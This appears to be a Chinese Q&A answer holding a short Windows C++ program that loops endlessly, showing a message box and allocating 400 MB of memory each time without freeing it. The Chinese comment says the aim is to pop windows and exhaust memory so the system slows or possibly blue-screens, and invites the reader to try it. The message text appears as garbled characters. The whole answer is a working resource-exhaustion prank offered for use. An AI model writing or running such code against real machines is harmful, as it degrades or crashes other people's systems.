#include "stdafx.h"
#include "windows.h"
#include<stdlib.h>
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
// TODO: Place code here.
char *a;
for(;;)
{
MessageBox(NULL,"ÄãºÃ","ÄãºÃ",MB_OK);
a=(char*)malloc(400000000);
}
return 0;
}
//C++代码,原理比较简单,不断弹出窗口,还有就是尝试用尽系统内存使系统变慢 ,至于会//不会蓝屏死机,不得而知,你试试,点击20下左右OK,应该有效果
温馨提示:答案为网友推荐,仅供参考